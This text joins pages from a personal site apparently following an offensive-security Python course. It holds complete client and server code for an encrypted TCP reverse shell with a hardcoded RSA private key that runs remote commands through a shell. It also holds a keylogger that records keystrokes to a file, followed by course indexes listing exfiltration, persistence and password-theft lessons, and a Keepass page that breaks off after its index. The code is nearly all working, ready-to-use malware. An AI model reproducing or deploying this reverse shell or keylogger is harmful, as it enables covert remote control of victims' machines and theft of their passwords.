[82](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-82)
[83](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-83)
[84](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-84)
[85](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-85)
[86](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-86)
[87](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-87)
[88](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-88)
[89](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-89)
[90](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-90)
[91](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-91)
[92](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-92)
[93](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-93)
[94](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-94)
[95](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-95)
[96](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-96)
[97](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-97)
[98](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-98)
[99](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-99)
[100](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-100)
[101](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-101)
[102](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-0-102) | `import subprocess import socket from Cryptodome.Cipher import PKCS1_OAEP from Cryptodome.PublicKey import RSA from Cryptodome.Cipher import AES from Cryptodome.Util import Padding IV = b"H" * 16 def GET_AES(cipher): privatekey = '''-----BEGIN RSA PRIVATE KEY----- MIIJKQIBAAKCAgEAt9mjsBED9D/MYnU+W5+6aP9SS1vgL9X6bThNkGKsZ5ZVfnoK 4BxMBHI5Gi/YtoCJjyAGsWMpxy1fQ+F+ZWVAkwZDoQMWTrfZASHmQgB944PfGA7q fn15kDXmCyvzbitRyWvTs1LDDNF7Q/54Qj82h/85ibOPzQrpwQTjEAs8CJ14YWXA JnqOC6devaDYKdB7SSlueVtoQ8BxWc3hOJHJpvgZQ/6NixnICLIrFN0YbKZo4A0D 3yRJIdumZw8uqwEMeIt41ja6zOG3gKtsG8suBZ/MvqX0WgojWr6hNs1Q8h3LtiSs PiUP/bTWD9zos8Yr7RuEabesjHlY0qcNzZ/YgKXdgxUkCikTjRon6Mvh7iWKAtEi lQlDeBYMGUvFUQ5FMF5LZJ5Q/7+JXulv8WhqKTp4dGpB3kUWuN+ltxBr+IYPhpBf McR97W+NuXDReUiIGFJpVI1m4AeCzz1BdAM7U928DcglK6IowMmN4McyKuv49YYP d7TNFjJWc7P6e19V3BsxA5jpCc6Dxp5AM6WC0FqgSSOGVCIkcHT5wLcALyaXOaO0 vhMgWWO233Of33wh/7oHclsc5r44MHlZrNSeX2QIHCFU4Mwp1hutIuIKkn5dLt1q mt2CDUO/uxGbdTf667c9TLYcYWoi/eDBdrVx7CkYI7g81RdcB6jGgbr9W4kCAwEA AQKCAgAIZt7PJgfrOpspiLgf0c3gDIMDRKCbLwkxwpfw2EGOvlUL4aHrmf9zWJD5 fGRH+tnOe6UyqBh5rL4kyQJQue7YiTm/+vcjA83b+mOeco1OP3GLlOrseul6SKxJ qGmIiFxFezMCh+64AD7E3bU7Oc5RKr3DaDxTH4ONOZ7y1cCZmDCvKso8N++T4sM2 oUofpxJrRoRw8VdzeTD07K61OhxgEAh/jfuD9tqoYxQK8Quzs2spig66PNtGu9X/ 8batQ/AA9kbAa2HgCRSswajAIGnrAeGGeOkQ0FPLStjtOzbOycPMgCKK+IChlIkP 0oWj6ZOKU26asjUlekov3kiINBzduF+bGOKGnoxeguSiQE1DtsfXisvADMp53rLN RjkzWDTN7l8zqgAd2hPB25Fhy5kKHA1MNqRPeUUIUp++FuYVJ1xNoMR61N6JvLzC UTrUZW7mMxqXisccsuU8OdGB2DECP+sS82dWZqoKFZKjza1N5XBSm1f7nCTQqtJq kYYA5d4FPJ1wxRKufRTklC6QSHoGm54z0ay4Mh0n08wIiYBRxsgtGk6crhpRfy12 e6lRU3htQnzc+JDrdZIjoL5lqDfi0wSxdVXAAQXRptsvSXwwt+h/zg9ZmqlsVoE1 hH7LeVyL31FRF1b2BiX7jyOeeoqZ1gkkNvwyvqnaOos+wGd2/QKCAQEA0aeVV0HM HpJ7hUib/btWbX/zYQEwQRRCbHWGsxROumkJPgfRzPhDohDgv4ncrX0w7+4PESGp 9MNZBa9kPuwDNFsVxIdpWZgmJdALqLwpWPnGswwVp6Lk1jMHD2GxLkknHLvfmND3 fuqVj7k/bKFayqejlY2SyNUv/h+DsQQL2esM8A4TLGlFOgfaoz0wPii2HmANQPSa 16xjV/0uQGHW260d1norNVZCmRDC3Gqz8/rcTGYwEkeCCQ3ctlUJyAFVu+ILyIga /kadDqiUkItIKl+fQI3stPyrHjh5cMUk+kPMjO36/yQ0f3Ox8cUkR5x3eW4RoFZQ /khhdDqVmieQ/wKCAQEA4H3GCf1LijS7069AEyvOKcKTL+nDGdqz+xMc+sbtha37 8hh9mjvFaljJcKb4AxTTnT8RrCnabdtmuAXRsfHOu1BZdJAaW+hgWgY+PJL+XpBQ 8D3954EvE2aX910DDMYz2slm0IL5we8KLg76ZHi+zO8woeedSD7yHbox6ybHZr0H L7G8fwI9zg/oz7+0P+vU3AV5hgnUDx5kY1hYNWmrBkgObRfJQNsiCDHkw6wRZPU+ XESQX2iUnh8HA7idWvLELFXjueHxEw15yKaw9toiO0T1MhbrBBsjElXDk6WuKmVj C2/ZvG939IOO2cW8UeBdTABhO630QQdDtAk0YqILdwKCAQEAjm1UrSSL8LD+rPs4 zdS40Ea+JkZSa8PBpEDrMzk2irjUiIlzY9W8zJq+tCCKBGoqFrUZE0BVX2xeS9ht N7nKK4U9cnezgCQ2tjVx1j2NsV5uODCbfXjSERo1T6PEZHdZ1NFlA0HjARuIY00r 4zZyoX3lSbIV5828ft0V7+mZy389GM/XArK5TsULKR5mabPqlRQXrOr/TklUa/AZ va858Z7XyF7Sf7eMIsQaPPdYLQVdJ6G8Qo7FrjT2nf+DV5ZgkfTsoFymSdva0px/ 4PpeGjs/yvEfv4xvC2a+SXgEuOfaTFtXyoDkETmdx2twTB3lpF68Jrq85yJw4i7y dvkuLQKCAQBefJGeIr5orUlhD6Iob4eWjA7nW7yCZUrbom/QHWpbmZ8xhp1XDVFK MZSXla9NnLZ0uNb3X6ZQFshlLA3Wl7ArpuX/6acuh+AGBBqt5DCsHJH0jCMSDY2C 3OuZccyW09V/gMWFfZshxTrDqAo7v5aPKx2NB69reRLu8C+Sif/jfixIJsbvrkHV OV0EE+wJ+3jcInHDuN9IfcJDDiwSTydsvWdVA23xnkn0qQtgUEwB8jcNHs6lWZ8z 7ltFda7FWOi4wG3ZDwAoxMM9cOuK+sTtrViGfJ7uW32nefGXc2Sa85F8ftdmOISE pdq6Tj+1NnoOQxqpw83KkQQuArHJ0eqBAoIBAQDPchq4XMwlEfjVjZCJEX++UyEA 5H2hKbWOXU9WNhZCKmScrAlkW/6L0lHs1mngfxxavKOy2jIoUhb2/zeA/MKx6Jxa PqiKaOdqTYn6yaLkRS+7jUndDeFqDVCLqt3NprltVzLphjOB0I8PsUnIj5lKcE5K DjtbjnJYCjj0o346t3abOOoqxqYJmXgieRWkjjidkBOvL/Td7OZXM6jPVj744+ZE K2D/g7XtAIOACmSpYTtHRl7bxcoKP7QiPksNG17w+LWUqF2TwBexyCDKCV5XSIB9 YVPwkPTGTNbOtTuTJk5hO+W4Nij4ERDdQlxd961YgRHORov+2sFREdhbrV0s -----END RSA PRIVATE KEY-----''' private_key = RSA.importKey(privatekey) decryptor = PKCS1_OAEP.new(private_key) return decryptor.decrypt(cipher).decode() def encrypt(message): encryptor = AES.new(AES_KEY, AES.MODE_CBC, IV) padded_message = Padding.pad(message, 16) encrypted_message = encryptor.encrypt(padded_message) return encrypted_message def decrypt(cipher): decryptor = AES.new(AES_KEY, AES.MODE_CBC, IV) decrypted_padded_message = decryptor.decrypt(cipher) decrypted_message = Padding.unpad(decrypted_padded_message, 16) return decrypted_message def connect(): s = socket.socket() s.connect(('192.168.0.152', 8080)) global AES_KEY AES_KEY = s.recv(1024) AES_KEY = GET_AES(AES_KEY) AES_KEY = AES_KEY.encode() print(AES_KEY) while True: command = s.recv(1024) command = decrypt(command).decode() print (command) if 'terminate' in command: s.close() break else: CMD = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE, stdin=subprocess.PIPE) result = CMD.stdout.read() s.send(encrypt(result)) connect()` |
Server side
-----------
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-1)
[2](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-2)
[3](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-3)
[4](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-4)
[5](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-5)
[6](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-6)
[7](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-7)
[8](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-8)
[9](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-9)
[10](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-10)
[11](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-11)
[12](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-12)
[13](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-13)
[14](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-14)
[15](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-15)
[16](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-16)
[17](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-17)
[18](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-18)
[19](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-19)
[20](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-20)
[21](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-21)
[22](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-22)
[23](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-23)
[24](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-24)
[25](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-25)
[26](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-26)
[27](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-27)
[28](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-28)
[29](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-29)
[30](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-30)
[31](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-31)
[32](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-32)
[33](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-33)
[34](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-34)
[35](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-35)
[36](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-36)
[37](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-37)
[38](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-38)
[39](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-39)
[40](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-40)
[41](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-41)
[42](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-42)
[43](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-43)
[44](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-44)
[45](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-45)
[46](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-46)
[47](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-47)
[48](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-48)
[49](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-49)
[50](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-50)
[51](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-51)
[52](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-52)
[53](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-53)
[54](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-54)
[55](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-55)
[56](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-56)
[57](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-57)
[58](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-58)
[59](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-59)
[60](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-60)
[61](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-61)
[62](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-62)
[63](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-63)
[64](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-64)
[65](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-65)
[66](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-66)
[67](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-67)
[68](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-68)
[69](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-69)
[70](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-70)
[71](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-71)
[72](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-72)
[73](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-73)
[74](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-74)
[75](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-75)
[76](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-76)
[77](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-77)
[78](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#__codelineno-1-78) | `import socket from Cryptodome.PublicKey import RSA from Cryptodome.Cipher import PKCS1_OAEP from Cryptodome.Cipher import AES from Cryptodome.Util import Padding import string import random IV = b"H" * 16 key = ''.join(random.choice(string.ascii_lowercase + string.ascii_uppercase + string.digits + '^!\$%&/()=?{[]}+~#-_.:,;<>\|\\') for _ in range(0, 32)) def SEND_AES(message): publickey = '''-----BEGIN PUBLIC KEY----- MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAt9mjsBED9D/MYnU+W5+6 aP9SS1vgL9X6bThNkGKsZ5ZVfnoK4BxMBHI5Gi/YtoCJjyAGsWMpxy1fQ+F+ZWVA kwZDoQMWTrfZASHmQgB944PfGA7qfn15kDXmCyvzbitRyWvTs1LDDNF7Q/54Qj82 h/85ibOPzQrpwQTjEAs8CJ14YWXAJnqOC6devaDYKdB7SSlueVtoQ8BxWc3hOJHJ pvgZQ/6NixnICLIrFN0YbKZo4A0D3yRJIdumZw8uqwEMeIt41ja6zOG3gKtsG8su BZ/MvqX0WgojWr6hNs1Q8h3LtiSsPiUP/bTWD9zos8Yr7RuEabesjHlY0qcNzZ/Y gKXdgxUkCikTjRon6Mvh7iWKAtEilQlDeBYMGUvFUQ5FMF5LZJ5Q/7+JXulv8Whq KTp4dGpB3kUWuN+ltxBr+IYPhpBfMcR97W+NuXDReUiIGFJpVI1m4AeCzz1BdAM7 U928DcglK6IowMmN4McyKuv49YYPd7TNFjJWc7P6e19V3BsxA5jpCc6Dxp5AM6WC 0FqgSSOGVCIkcHT5wLcALyaXOaO0vhMgWWO233Of33wh/7oHclsc5r44MHlZrNSe X2QIHCFU4Mwp1hutIuIKkn5dLt1qmt2CDUO/uxGbdTf667c9TLYcYWoi/eDBdrVx 7CkYI7g81RdcB6jGgbr9W4kCAwEAAQ== -----END PUBLIC KEY-----''' public_key = RSA.importKey(publickey) encryptor = PKCS1_OAEP.new(public_key) encryptedData = encryptor.encrypt(message) return encryptedData def encrypt(message): encryptor = AES.new(key.encode(), AES.MODE_CBC, IV) padded_message = Padding.pad(message, 16) encrypted_message = encryptor.encrypt(padded_message) return encrypted_message def decrypt(cipher): decryptor = AES.new(key.encode(), AES.MODE_CBC, IV) decrypted_padded_message = decryptor.decrypt(cipher) decrypted_message = Padding.unpad(decrypted_padded_message, 16) return decrypted_message def connect(): s = socket.socket() s.bind(('192.168.0.152', 8080)) s.listen(1) print('[+] Listening for incoming TCP connection on port 8080') conn, addr = s.accept() print(key.encode()) conn.send(SEND_AES(key.encode())) while True: store = '' command = input("Shell> ") if 'terminate' in command: conn.send('terminate'.encode()) conn.close() break else: command = encrypt(command.encode()) conn.send(command) result = conn.recv(1024) try: print(decrypt(result).decode()) except: print("[-] unable to decrypt/receive data!") connect()` |
Last update: 2024-03-29
Created: April 11, 2023 16:43:35
Back to top
---
# Simple keylogger in python - Hacking Life
[Skip to content](https://amandaguglieri.github.io/hackinglife/python/python-keylogger/#simple-keylogger-in-python)
Simple keylogger in python
==========================
From course: [Python For Offensive PenTest: A Complete Practical Course](https://www.udemy.com/course/python-for-offensive-security-practical-course/)
.
General index of the course
* Gaining persistence shells (TCP + HTTP):
* [Coding a TCP connection and a reverse shell](https://amandaguglieri.github.io/hackinglife/python/coding-a-tcp-reverse-shell/)
.
* [Coding a low level data exfiltration - TCP connection](https://amandaguglieri.github.io/hackinglife/python/coding-a-low-level-data-exfiltration-tcp/)
.
* [Coding an http reverse shell](https://amandaguglieri.github.io/hackinglife/python/coding-an-http-reverse-shell/)
.
* [Coding a data exfiltration script for a http shell](https://amandaguglieri.github.io/hackinglife/python/coding-a-data-exfiltration-script-http-shell/)
.
* [Tunning the connection attempts](https://amandaguglieri.github.io/hackinglife/python/tunning-the-connection-attemps/)
.
* [Including cd command into TCP reverse shell](https://amandaguglieri.github.io/hackinglife/python/including-cd-command-into-tcp-reverse-shell/)
.
* Advanced scriptable shells:
* [Using a Dynamic DNS instead of your bared attacker public ip](https://amandaguglieri.github.io/hackinglife/python/ddns-aware-shell/)
.
* [Making your binary persistent](https://amandaguglieri.github.io/hackinglife/python/making-your-binary-persistent/)
.
* [Making a screenshot](https://amandaguglieri.github.io/hackinglife/python/making-a-screenshot/)
.
* [Coding a reverse shell that searches files](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/)
.
* Techniques for bypassing filters:
* [Coding a reverse shell that scans ports](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/)
.
* [Hickjack the Internet Explorer process to bypass an host-based firewall](https://amandaguglieri.github.io/hackinglife/python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/)
.
* [Bypassing Next Generation Firewalls](https://amandaguglieri.github.io/hackinglife/python/bypassing-next-generation-firewalls/)
.
* [Bypassing IPS with handmade XOR Encryption](https://amandaguglieri.github.io/hackinglife/python/bypassing-ips-with-handmade-xor-encryption/)
.
* Malware and crytography:
* [TCP reverse shell with AES encryption](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-aes-encryption/)
.
* [TCP reverse shell with RSA encryption](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-rsa-encryption/)
.
* [TCP reverse shell with hybrid encryption AES + RSA](https://amandaguglieri.github.io/hackinglife/python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/)
.
* Password Hickjacking:
* [Simple keylogger in python](https://amandaguglieri.github.io/hackinglife/python/python-keylogger/)
.
* [Hijacking Keepass Password Manager](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/)
.
* [Dumping saved passwords from Google Chrome](https://amandaguglieri.github.io/hackinglife/python/dumping-chrome-saved-passwords/)
.
* [Man in the browser attack](https://amandaguglieri.github.io/hackinglife/python/man-in-the-browser-attack/)
.
* [DNS Poisoning](https://amandaguglieri.github.io/hackinglife/python/dns-poisoning/)
.
* Privilege escalation:
* [Weak service file permission](https://amandaguglieri.github.io/hackinglife/python/privilege-escalation/)
.
| | |
| --- | --- |
| [1](https://amandaguglieri.github.io/hackinglife/python/python-keylogger/#__codelineno-0-1)
[2](https://amandaguglieri.github.io/hackinglife/python/python-keylogger/#__codelineno-0-2)
[3](https://amandaguglieri.github.io/hackinglife/python/python-keylogger/#__codelineno-0-3)
[4](https://amandaguglieri.github.io/hackinglife/python/python-keylogger/#__codelineno-0-4)
[5](https://amandaguglieri.github.io/hackinglife/python/python-keylogger/#__codelineno-0-5)
[6](https://amandaguglieri.github.io/hackinglife/python/python-keylogger/#__codelineno-0-6)
[7](https://amandaguglieri.github.io/hackinglife/python/python-keylogger/#__codelineno-0-7)
[8](https://amandaguglieri.github.io/hackinglife/python/python-keylogger/#__codelineno-0-8)
[9](https://amandaguglieri.github.io/hackinglife/python/python-keylogger/#__codelineno-0-9)
[10](https://amandaguglieri.github.io/hackinglife/python/python-keylogger/#__codelineno-0-10)
[11](https://amandaguglieri.github.io/hackinglife/python/python-keylogger/#__codelineno-0-11)
[12](https://amandaguglieri.github.io/hackinglife/python/python-keylogger/#__codelineno-0-12)
[13](https://amandaguglieri.github.io/hackinglife/python/python-keylogger/#__codelineno-0-13)
[14](https://amandaguglieri.github.io/hackinglife/python/python-keylogger/#__codelineno-0-14)
[15](https://amandaguglieri.github.io/hackinglife/python/python-keylogger/#__codelineno-0-15) | `# Python For Offensive PenTest: A Complete Practical Course - All rights reserved # Follow me on LinkedIn https://jo.linkedin.com/in/python2 #Ref: https://pythonhosted.org/pynput/keyboard.html#monitoring-the-keyboard from pynput.keyboard import Key, Listener def on_press(key): fp=open("keylogs.txt","a") #create a text file and append the key in it print(key) fp.write(str(key)+"\n") fp.close() with Listener(on_press=on_press) as listener: # if key is pressed, call on_press function listener.join()` |
Last update: 2024-03-29
Created: April 20, 2023 16:58:49
Back to top
---
# Hijacking Keepass Password Manager - Hacking Life
[Skip to content](https://amandaguglieri.github.io/hackinglife/python/hijacking-keepass/#hijacking-keepass-password-manager)
Hijacking Keepass Password Manager
==================================
From course: [Python For Offensive PenTest: A Complete Practical Course](https://www.udemy.com/course/python-for-offensive-security-practical-course/)
.
General index of the course
* Gaining persistence shells (TCP + HTTP):
* [Coding a TCP connection and a reverse shell](https://amandaguglieri.github.io/hackinglife/python/coding-a-tcp-reverse-shell/)
.
* [Coding a low level data exfiltration - TCP connection](https://amandaguglieri.github.io/hackinglife/python/coding-a-low-level-data-exfiltration-tcp/)
.
* [Coding an http reverse shell](https://amandaguglieri.github.io/hackinglife/python/coding-an-http-reverse-shell/)
.
* [Coding a data exfiltration script for a http shell](https://amandaguglieri.github.io/hackinglife/python/coding-a-data-exfiltration-script-http-shell/)
.
* [Tunning the connection attempts](https://amandaguglieri.github.io/hackinglife/python/tunning-the-connection-attemps/)
.
* [Including cd command into TCP reverse shell](https://amandaguglieri.github.io/hackinglife/python/including-cd-command-into-tcp-reverse-shell/)
.
* Advanced scriptable shells:
* [Using a Dynamic DNS instead of your bared attacker public ip](https://amandaguglieri.github.io/hackinglife/python/ddns-aware-shell/)
.
* [Making your binary persistent](https://amandaguglieri.github.io/hackinglife/python/making-your-binary-persistent/)
.
* [Making a screenshot](https://amandaguglieri.github.io/hackinglife/python/making-a-screenshot/)
.
* [Coding a reverse shell that searches files](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-searches-files/)
.
* Techniques for bypassing filters:
* [Coding a reverse shell that scans ports](https://amandaguglieri.github.io/hackinglife/python/coding-a-reverse-shell-that-scans-ports/)
.
